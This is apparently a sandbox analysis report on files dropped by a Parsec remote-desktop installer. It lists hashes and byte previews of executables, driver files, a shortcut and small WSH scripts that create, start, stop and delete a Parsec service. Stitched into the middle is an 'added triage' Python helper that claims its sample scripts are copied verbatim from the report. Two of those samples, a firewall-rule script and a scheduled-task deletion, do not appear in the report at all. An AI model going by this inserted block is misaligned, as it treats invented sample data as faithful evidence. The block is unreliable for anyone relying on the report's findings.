                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):412
                            Entropy (8bit):4.864624018635759
                            Encrypted:false
                            SSDEEP:12:ixc3AAl7J2WjifH0//37ClesqAIN58CzA7n:iOAs7T//7D7AjG+n
                            MD5:971E2A344A6E17347A81EEB21ADA7BA7
                            SHA1:37E034C29ADDA9B118B75BFDC7C6F41AAC71E257
                            SHA-256:01F62A12DE3307B375DFF3EBCD6961D76FFCBC24F70682C7875655A811CE76A1
                            SHA-512:5EA0750DC07FF1A0EB1807043B48FB9ED54F6DCB96CE03CB543B0EA36D326779814B6CB87091373574911662A35D75B576E35C5B8D781DB36FE1503F8287C65D
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..If Wscript.Arguments.Count = 0 Then..path = fs.GetAbsolutePathName("") & "\pservice.exe".Else..path = Wscript.Arguments(0).End If..args = "sc.exe create Parsec binPath= ""\""" & path & "\"""" start= auto type= interact type= own".sh.Run args, 0, true..args = "sc.exe start Parsec".sh.Run args, 0, true.
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):164
                            Entropy (8bit):4.745893446511344
                            Encrypted:false
                            SSDEEP:3:jeYcRm81GX7Z9HCCodNFfXSDoqObvv8oFKsocGAM4JqObvn:jeUi+C/SD+Lv81cXMq7Ln
                            MD5:F7B0C63E7AEA5CBD96F7BF1021B28B73
                            SHA1:FC5B11A6BF022740DE3BA15455B06AD3F061366B
                            SHA-256:71F9CC28497B959377439F6611615EF582745DD5B9CCA02B5C4B24BB1FC3DFB8
                            SHA-512:C957B7B45B188AF0B6E6698507E94564E8E5CCC8DBF5F0237827DF373878291095887422584F7F3B7833CBCDD682531FA75C974BA1137031B32BF2FFBA268191
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe control Parsec 200".sh.Run args, 0, true..args = "taskkill /F /IM parsecd.exe".sh.Run args, 0, true.
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):150
                            Entropy (8bit):4.521058872484995
                            Encrypted:false
                            SSDEEP:3:jeYcRm81GX7Z9HCCodNFNv1p+aObvv8odNFPmYaObvn:jeUi+CNj+LLv8CuYLLn
                            MD5:B90E75DD7903CB2D6328BB3714865C7A
                            SHA1:2D32868DEB198726ED5FEB80B66542BAD7FBACEE
                            SHA-256:970B3C2A9EA1906A177810990478932E3517F47ABA267CF2AB9E4BA65E7B475F
                            SHA-512:3D4BFB86EC98FD85843AE5B63DCF5F475C6500380F02BB4D0DEE15A5F7E2334ABDBBCD9420B8AC05B5BEB8A63B9EA16ABCD70AE01C04B87A423FC288FF4DCA0A
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe stop Parsec".sh.Run args, 0, true..args = "sc.exe delete Parsec".sh.Run args, 0, true.
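Added triage example (not part of the Joe Sandbox report and not Parsec's own code): the WSH scripts dropped by parsec-windows.exe are shown above only as one-line previews in which the report renders every non-printable byte, including the scripts' line endings, as '.'. Splitting such a preview on '.' is lossy ("sh.Run", "netsh.exe", "sc.exe"), so the helper below instead recovers the exact command lines the scripts hand to WScript.Shell.Run by locating the VBScript expressions assigned to `args` and re-evaluating their string concatenation (with `""` as the escaped quote). It then tags each command with the host change it implies: an inbound firewall allow on all profiles, an auto-start interactive service, a scheduled-task deletion. The `PREVIEWS` dictionary is copied verbatim from the records above; the `<path>` placeholder is an assumption standing in for the script argument that is only known at run time.

```python
import re

# Added triage helper (not from the Joe Sandbox report or from Parsec).
# "Preview:" fields of three WSH scripts dropped by parsec-windows.exe,
# copied from the report: firewall rule add, service create, task delete.
# The report shows each non-printable byte (here CR/LF) as '.'.
PREVIEWS = {
    "fw_add": r'Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..path = Wscript.Arguments(0)..args = "netsh.exe advfirewall firewall add rule name=Parsec dir=in action=allow program=""" & path & """ enable=yes profile=public,private,domain".sh.Run args, 0, true.',
    "svc_create": r'Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..If Wscript.Arguments.Count = 0 Then..path = fs.GetAbsolutePathName("") & "\pservice.exe".Else..path = Wscript.Arguments(0).End If..args = "sc.exe create Parsec binPath= ""\""" & path & "\"""" start= auto type= interact type= own".sh.Run args, 0, true..args = "sc.exe start Parsec".sh.Run args, 0, true.',
    "task_delete": r'Set sh = CreateObject("Wscript.Shell").Dim args..args = "schtasks /delete /tn ParsecTeams /f".sh.Run args, 0, true.',
}

# A VBScript string literal: double-quoted, with "" as the escaped quote.
_LITERAL = r'"(?:[^"]|"")*"'
_IDENT = r'[A-Za-z_]\w*'
_PIECE = re.compile(f"{_LITERAL}|{_IDENT}")
# `args = <piece> & <piece> & ...`, where a piece is a literal or a variable.
_ASSIGN = re.compile(
    rf"args\s*=\s*((?:{_LITERAL}|{_IDENT})(?:\s*&\s*(?:{_LITERAL}|{_IDENT}))*)"
)


def _eval_piece(piece: str) -> str:
    """Unescape a literal; a variable becomes a <name> placeholder (assumption:
    its value, e.g. the installer-supplied path, is only known at run time)."""
    if piece.startswith('"'):
        return piece[1:-1].replace('""', '"')
    return f"<{piece}>"


def extract_commands(preview: str) -> list[str]:
    """Return every command line the dropped script passes to Shell.Run."""
    commands = []
    for match in _ASSIGN.finditer(preview):
        pieces = _PIECE.findall(match.group(1))
        commands.append("".join(_eval_piece(p) for p in pieces))
    return commands


def indicators(command: str) -> set[str]:
    """Tag a recovered command with the host changes it makes."""
    tool = command.split()[0].lower()
    tags: set[str] = set()
    if tool == "netsh.exe" and "firewall add rule" in command:
        tags.add("firewall-rule-add")
        if "dir=in action=allow" in command:
            tags.add("inbound-allow")
        if "profile=public,private,domain" in command:
            tags.add("all-profiles")
    if tool == "sc.exe" and " create " in command:
        tags.add("service-create")
        if "start= auto" in command:
            tags.add("autostart")
        if "type= interact" in command:  # SERVICE_INTERACTIVE_PROCESS requested
            tags.add("interactive-service")
    if tool == "schtasks" and "/delete" in command:
        tags.add("task-delete")
    return tags


def summarize(previews: dict[str, str]) -> dict[str, list[tuple[str, set[str]]]]:
    """Map each dropped script to its recovered commands and their tags."""
    return {
        name: [(cmd, indicators(cmd)) for cmd in extract_commands(text)]
        for name, text in previews.items()
    }


if __name__ == "__main__":
    for name, entries in summarize(PREVIEWS).items():
        for cmd, tags in entries:
            print(f"{name}: {cmd}  {sorted(tags)}")
```

Run directly, it prints one line per recovered command; `extract_commands` works on any Joe Sandbox preview of a WSH script that builds its command line in a variable named `args`, and will miss commands built under another name or passed to Shell.Run inline.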
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Mar 28 13:46:56 2024, mtime=Thu Nov 14 00:58:31 2024, atime=Thu Mar 28 13:46:56 2024, length=465792, window=hide
                            Category:dropped
                            Size (bytes):800
                            Entropy (8bit):4.574199321638663
                            Encrypted:false
                            SSDEEP:12:8unXk1c0YXZh9GKe0bdpF44X82BErlQ0aYtKjA53bdpW31l6Wz1mV:8s0Kkgd7BMt2A9dIFj1m
                            MD5:35E8CFC2244D10192DBADA2916F590CA
                            SHA1:FEA96A9CE59D2D891F1310097ED092A0834AC80D
                            SHA-256:FC3B4A9A9A90783F237EA4029F76940F5655F3FA0E4E3ACD39CEC57B557C87CD
                            SHA-512:5E26D5D25DA6F9CF1DB39723C1E6D1D7B3590072DC30902F7B126E4FC7A98088562DC56A604B0FE8A4BEEB8FD2623FF557CCBBA7C63E42AEA49463A6C516E285
                            Malicious:false
                            Preview:L..................F.... ....0.......;.86...0..............................q....P.O. .:i.....+00.../C:\.....................1.....nYM...PROGRA~1..t......O.InYM.....B...............J......t.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....nYP...Parsec..>......nYM.nYP.............................%.P.a.r.s.e.c.....b.2.....|X.u .parsecd.exe.H......|X.unYP...............................p.a.r.s.e.c.d...e.x.e.......R...............-.......Q...........lb>l.....C:\Program Files\Parsec\parsecd.exe..2.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.P.a.r.s.e.c.\.p.a.r.s.e.c.d...e.x.e.`.......X.......506407...........hT..CrF.f4... .T.2=.b...,...W..hT..CrF.f4... .T.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                            Process:C:\Windows\System32\runonce.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):24576
                            Entropy (8bit):2.0984574355600807
                            Encrypted:false
                            SSDEEP:384:nuRJRk8tA/cG7w9GWDX9zAB/YB/q14eBKWtzrgUKeyxNZBDRnITNVOk1d6SVhzuc:pDD
                            MD5:9E2A70FC76A9393BFD2CC00E75D1DB88
                            SHA1:6084D21B93A4CE88F16F90D2FEA0E773C06E1B80
                            SHA-256:4D285F6674FD4B067099A39E7DAC54655BC13FAE5FCA5DC6028B576973BE9FBF
                            SHA-512:E656753E92ABDF2F82EC3FBE018E353943879B8672BB50E942BF733ED50F6851754186E21CF19CD6A4BE6D26DDAD2B435365FBC2AD744E9535B65D7A958F7366
                            Malicious:false
                            Preview:. ..............................................................................d...x.................... ......eJ........v.86..Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................J.................86..........E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.E.x.p.l.o.r.e.r.\.E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...e.t.l.........P.P.d...x...................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\uu8v4UUzTU.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3220480
                            Entropy (8bit):6.3129799359419705
                            Encrypted:false
                            SSDEEP:49152:Odx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoHVHNTQTEjy333zmgS:vHDYsqiPRhINnq95FoHVBy333CB
                            MD5:828B7D7624C14BE1F3D8122F6E2FAC53
                            SHA1:1E51B52B0E6AA39BB4C465767E5131B99E39CAB2
                            SHA-256:6F28DFB808D325740AE9189598AD4AB2D7E2B77293DCFBB7A6B00AC852B719DF
                            SHA-512:E83136F55417D0AD0748A78FAA7E9C88885520B4B596ACA51B70F3816D21FD71112A0BD1E6968FB8CB22E5C3956B3BA0A5D20DACFC54F1EEF3EAB5FC7661DDCB
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................B,.........`V,......`,...@...........................2...........@......@....................-.......-..9............................................................-.......................-.......-......................text.....,.......,................. ..`.itext...(...0,..*....,............. ..`.data........`,......F,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-...... -.............@..@.rsrc................"-.............@..@..............1.......0.............@..@........................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):5.814115788739565
                            Encrypted:false
                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                            MD5:CFF85C549D536F651D4FB8387F1976F2
                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):5.298362543684714
                            Encrypted:false
                            SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                            MD5:675C4948E1EFC929EDCABFE67148EDDD
                            SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                            SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                            SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):200704
                            Entropy (8bit):6.552977186185562
                            Encrypted:false
                            SSDEEP:3072:2pBNN6AmU9cDlKd3P6V9nSm49WTgKg4Fa1V3FuXRAuAg0FubA9cVsL+73:2pzxmQ3yL+9MgKbxAOEXY
                            MD5:A858C1A57E32485505B1977CF0A125BE
                            SHA1:25D86C4B51F7CC10FC70E3A0493A39C4460CC350
                            SHA-256:1462A072345E86318B981089B08B613A34027DDF527BFB66606C683F218FC3B4
                            SHA-512:32B597FC2412A9407FD12AC77C556FF9740F1DD0D2055426D11A7BAF21B09C536A84CFB97865B4E94168656514E7CE71EB2BC4122AA340100F4CE483BAD1722D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......;.....Q..Q..Q.@SQs.Q.@QQ..Q.@PQb.QD..Pj.QD..PN.QD..P_.Q.#lQ~.Q.#iQv.Q..Q..Q.P~.Q.P~.Q.]Q~.Q..5Q~.Q.P~.QRich..Q........................PE..L.....sX...........!.........2...............................................p............@.................................d...d....0..P....................@..| ......p...........................`...@...............X............................text...c........................... ..`.rdata..<...........................@..@.data...(...........................@....gfids..............................@..@.tls......... ......................@....rsrc...P....0......................@..@.reloc..| ...@..."..................@..B........................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):5.814115788739565
                            Encrypted:false
                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                            MD5:CFF85C549D536F651D4FB8387F1976F2
                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):9728
                            Entropy (8bit):5.158136237602734
                            Encrypted:false
                            SSDEEP:96:o0svUu3Uy+sytcS8176b+XR8pCHFcMcxSgB5PKtAtgt+Nt+rnt3DVEB3YcNqkzfS:o0svWyNO81b8pCHFcM0PuAgkOyuIFc
                            MD5:6C3F8C94D0727894D706940A8A980543
                            SHA1:0D1BCAD901BE377F38D579AAFC0C41C0EF8DCEFD
                            SHA-256:56B96ADD1978B1ABBA286F7F8982B0EFBE007D4A48B3DED6A4D408E01D753FE2
                            SHA-512:2094F0E4BB7C806A5FF27F83A1D572A5512D979EEFDA3345BAFF27D2C89E828F68466D08C3CA250DA11B01FC0407A21743037C25E94FBE688566DD7DEAEBD355
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....Oa...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):5.298362543684714
                            Encrypted:false
                            SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                            MD5:675C4948E1EFC929EDCABFE67148EDDD
                            SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                            SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                            SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):5.814115788739565
                            Encrypted:false
                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                            MD5:CFF85C549D536F651D4FB8387F1976F2
                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3422620069068625
                            Encrypted:false
                            SSDEEP:48:qKDBQE7F4aBr1wH8l9QIXTZShMmj3jkCTbGr7X:5WkFZruHSXTH6jkCnGr7X
                            MD5:2F69AFA9D17A5245EC9B5BB03D56F63C
                            SHA1:E0A133222136B3D4783E965513A690C23826AEC9
                            SHA-256:E54989D2B83E7282D0BEC56B098635146AAB5D5A283F1F89486816851EF885A0
                            SHA-512:BFD4AF50E41EBC56E30355C722C2A55540A5BBDDB68F1522EF7AABFE4F5F2A20E87FA9677EE3CDB3C0BF5BD3988B89D1224D32C9F23342A16E46C542D8DC0926
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L...!.Oa...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):5.298362543684714
                            Encrypted:false
                            SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                            MD5:675C4948E1EFC929EDCABFE67148EDDD
                            SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                            SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                            SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
